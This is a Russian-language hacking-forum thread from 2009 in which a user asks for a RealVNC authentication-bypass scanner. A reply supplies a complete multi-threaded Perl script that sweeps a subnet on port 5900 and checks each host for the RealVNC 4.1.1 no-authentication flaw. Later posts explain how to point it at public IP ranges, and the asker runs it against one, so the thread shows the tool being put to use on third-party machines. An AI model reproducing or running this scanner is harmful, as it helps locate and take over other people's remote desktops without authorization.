Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
RealVNC Bypass Authentication Scanner |

11.06.2009, 13:20
|
|
Banned
Регистрация: 30.05.2009
Сообщений: 167
Провел на форуме: 221264
Репутация:
33
|
|
RealVNC Bypass Authentication Scanner
помогите!! необходима прога RealVNC Bypass Authentication Scanner для линукса! а конкретно gentoo
поставил чтото - но оказалось что это просто vnc viewоблазил весь инет но так и ненашел где скачать RealVNC Bypass Authentication Scanner для генты!! заранее спс!!
|
|
|

11.06.2009, 13:29
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 577
Провел на форуме: 1636674
Репутация:
171
|
|
в MSF вроде был. попробуй 
|
|
|

11.06.2009, 13:42
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме: 919131
Репутация:
74
|
|
Тыц-тыц-клац
А черт, тебе же для генты, а это виндовый! Тогда не знаю. Ну пусть все равно будет.
Последний раз редактировалось fl00der; 11.06.2009 в 13:44..
|
|
|

11.06.2009, 20:55
|
|
Banned
Регистрация: 30.05.2009
Сообщений: 167
Провел на форуме: 221264
Репутация:
33
|
|
|
|
|

11.06.2009, 21:24
|
|
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме: 2916750
Репутация:
277
|
|
внц сканер вроде и под винду и под линукс....
|
|
|

11.06.2009, 21:58
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме: 1934122
Репутация:
118
|
|
PHP код:
#!/usr/bin/perl
# Multi-threaded scan for OpenVNC 4.11 authentication bypass.
# Based on Tyler Krpata's Perl scanning code.
use strict;
use warnings;
use IO::Socket;
use threads;
use threads::shared;
use Errno qw(EAGAIN);
# Configuration variables
use constant VNC_PORT => 5900;
my $splits = 5; # Creates 2^N processes.
my $avg_time = 5; # Tweak this to get better time estimates.
our $subnet;
our @results : shared;
our $todo = 0;
my $orig_thread = "yes";
my $start;
my $end;
my $time_estimate;
my $elapsed = time;
my $out_file;
++$|; # To watch as the results come in, in real time.
$subnet = $ARGV[0] || ""; # Get subnet from command line, else ask for it.
while (1) {
last if $subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/;
print "\nWhat subnet do you want to scan? ";
chomp($subnet = <STDIN>);
print "That does not look right. Enter something like 192.168.1.*\n\n";
}
# Put the subnet in the form x.y.z. so we can just concatenate the hostnum.
$subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
$subnet .= ".";
$out_file = "VNC_" . $subnet . "txt";
# Mostly a guesstimate
$time_estimate = $avg_time * (256 / (2**$splits));
$time_estimate = int ($time_estimate / 60);
$time_estimate += 4;
print "\nScanning subnet ${subnet}x -- this should take approximately
$time_estimate minute(s).\n";
print "[!] = Vulnerable,[*] = Safe, [.] = No response.\n\n";
CHECK: {
unless ($splits >= 0 && $splits <= 8) {
die "ERROR: Do not split $splits times--that makes no sense.\n";
}
unless ($splits <= 5) {
warn "Reduce the number of splits from $splits to 5 or less if you
get memory errors.\n\n";
}
}
# Ugly, but this works.
DivideWork() if $splits >= 1;
DivideWork() if $splits >= 2;
DivideWork() if $splits >= 3;
DivideWork() if $splits >= 4;
DivideWork() if $splits >= 5;
DivideWork() if $splits >= 6;
DivideWork() if $splits >= 7;
DivideWork() if $splits >= 8;
# Which IPs this thread scans.
$start = $todo << (8 - $splits);
$end = $start + (256 / (2**$splits)) - 1;
foreach ($start .. $end) {
Scan_VNC($_);
}
wait until $?; # Wait for children to finish.
exit unless $orig_thread eq "yes";
# Only the original parent thread will continue.
$elapsed = time - $elapsed;
$elapsed /= 60;
$elapsed = int $elapsed;
print "\n\nFinished scanning ${subnet}x in $elapsed minute(s).\n";
SaveData();
exit;
####################################
sub DivideWork {
my $pid;
FORK: {
$todo *= 2;
if ($pid = fork) {
# Parent
++$todo;
} elsif (defined $pid) {
# Child
$orig_thread = "no";
} elsif ($! == EAGAIN) {
# Recoverable forking error.
sleep 7;
redo FORK;
} else {
# Unable to fork.
die "Unable to fork: $!\n";
}
}
}
sub SaveData {
my $vulns = 0;
open(FOUND, ">", $out_file) or die "Cannot open $out_file -- $!";
foreach my $IP (1..254) {
my $record;
$record = $results[$IP];
unless ($record =~ m/not vulnerable/io) {
++$vulns;
print FOUND $record;
}
}
print FOUND "\nVulnerabilites found: $vulns";
close(FOUND) or die "Cannot close $out_file -- $!";
print "Data saved to ${out_file}\n\n";
}
sub Scan_VNC {
# Scan for OpenVNC 4.11 authentication bypass.
my $hostnum = shift;
my $host = $subnet . $hostnum;
my $sock;
my $proto_ver;
my $ignored;
my $auth_type;
my $sec_types;
my $vnc_data;
$host or die("ERROR: no host passed to Scan_VNC.\n");
# The host numbers .0 and .255 are reserved; ignore them.
if ($hostnum <= 0 or $hostnum >= 255) { return; }
# Format things nicely--that crazy formula just adds spaces.
$results[$hostnum] = "$host";
$results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
unless ($sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => VNC_PORT, Proto => 'tcp',)) {
$results[$hostnum] .= "Not vulnerable, no response.\n";
print ".";
return;
}
# Negotiate protocol version.
$sock->read($proto_ver, 12);
print $sock $proto_ver;
# Get supported security types and ignore them.
$sock->read($sec_types, 1);
$sock->read($ignored, unpack('C', $sec_types));
# Claim that we only support no authentication.
print $sock "\x01";
# We should get "0000" back, indicating that they won't fall back to no authentication.
$sock->read($auth_type, 4);
if (unpack('I', $auth_type)) {
$results[$hostnum] .= "Not vulnerable, refused to support
authentication type.\n";
print "*";
close($sock);
return;
}
# Client initialize.
print $sock "\x01";
# If the server starts sending data, we're in.
$sock->read($vnc_data, 4);
if (unpack('I', $vnc_data)) {
$results[$hostnum] .= "VULNERABLE! $proto_ver\n";
print "!";
} else {
$results[$hostnum] .= "Not vulnerable, did not send data.\n";
print "*";
}
close($sock);
return;
}
|
|
|

11.06.2009, 22:07
|
|
Banned
Регистрация: 30.05.2009
Сообщений: 167
Провел на форуме: 221264
Репутация:
33
|
|
shellz[21h] пасиб конечно, но мона пояснить как юзать скрипт
|
|
|

11.06.2009, 22:23
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме: 1934122
Репутация:
118
|
|
замени 31 строчку кода на
Код:
last if $subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/;
там косяк в регулярке.
запускается вот так:
]$ perl vnc.pl 85.18.3 - будет сканить 85.18.3.*
|
|
|

11.06.2009, 22:29
|
|
Banned
Регистрация: 30.05.2009
Сообщений: 167
Провел на форуме: 221264
Репутация:
33
|
|
ок спс
буду пробывать
|
|
|

11.06.2009, 22:38
|
|
Banned
Регистрация: 30.05.2009
Сообщений: 167
Провел на форуме: 221264
Репутация:
33
|
|
так я в перле не шарю вообще
zaG-laptop code # perl realvnc.pl 77.232.1
realvnc.pl line 8:
This Perl hasn't been configured and built properly for the threads
module to work. (The 'useithreads' configuration option hasn't been used.)
Having threads support requires all of Perl and all of the XS modules in
the Perl installation to be rebuilt, it is not just a question of adding
the threads module. (In other words, threaded and non-threaded Perls
are binary incompatible.)
If you want to the use the threads module, please contact the people
who built your Perl.
Cannot continue, aborting.
BEGIN failed--compilation aborted at /usr/lib/perl5/5.8.8/i686-linux/threads.pm line 28.
Compilation failed in require at realvnc.pl line 8.
BEGIN failed--compilation aborted at realvnc.pl line 8.
zaG-laptop code #
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|